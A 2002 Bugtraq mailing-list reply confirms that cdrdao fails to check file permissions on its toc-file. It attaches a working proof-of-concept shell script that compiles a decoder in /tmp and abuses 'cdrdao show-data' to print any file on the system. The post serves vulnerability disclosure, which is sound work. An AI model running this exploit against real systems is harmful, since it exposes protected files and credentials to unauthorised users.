[23855] in bugtraq
Re: cdrdao insecure filehandling
daemon@ATHENA.MIT.EDU (Guillaume PELAT)
Tue Jan 15 17:52:17 2002
Message-ID: <006501c19da9$688ed6f0$4d3e010a@intexxiaxh2dm7>
From: "Guillaume PELAT" <guillaume.pelat@intexxia.com>
To: <bugtraq@securityfocus.com>
Date: Tue, 15 Jan 2002 10:45:46 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0062_01C19DB1.CA2B6BA0"
------=_NextPart_000_0062_01C19DB1.CA2B6BA0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
"Jens Steube" <jsteube@lastflood.com> wrote in message
news:1010876960.3c40c220caef8@troja.dnsalias.org...
> --[ Bugs ]--
>
> Cdrdao doesnt check for permissions when it trys to open a file
> as its "toc-file". So it was possible to open all Files on the
> System, but it skips the Output on its Error-Message. Maybe it is
> possible to trick to read all these Files.
I confirm it is possible to read all these files using show-data command.
A proof of concept script is attached.
--
Guillaume Pelat
Security Expert
INTEXXIA
171 Av. Georges Clemenceau
92024 NANTERRE CEDEX - FRANCE
tel: +33 1 55 69 49 10
fax: +33 1 55 69 78 80
http://www.intexxia.com
------=_NextPart_000_0062_01C19DB1.CA2B6BA0
Content-Type: application/octet-stream;
name="show_file.sh"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="show_file.sh"
#!/bin/sh=0A=
=0A=
if [ "$1" ]; then=0A=
cat > /tmp/t.c <<EOF=0A=
#include <stdio.h>=0A=
int main()=0A=
{=0A=
int i;=0A=
while (fscanf(stdin, "%i", &i) > 0)=0A=
{=0A=
printf("%c%c", (i & 0xff00) >> 8, i & 0xff);=0A=
}=0A=
return 0;=0A=
}=0A=
EOF=0A=
cat > /tmp/t.toc <<EOF=0A=
CD_ROM=0A=
TRACK MODE1_RAW=0A=
FILE "$1" 0=0A=
EOF=0A=
gcc /tmp/t.c -o /tmp/show=0A=
echo `cdrdao show-data -v 0 --force /tmp/t.toc 2>&1 | grep -v WARNING | =
sed 's/.*://g' ` | /tmp/show=0A=
rm -f /tmp/t.c /tmp/show /tmp/t.toc=0A=
else=0A=
echo "Syntax: $0 filename"=0A=
fi=0A=
------=_NextPart_000_0062_01C19DB1.CA2B6BA0--
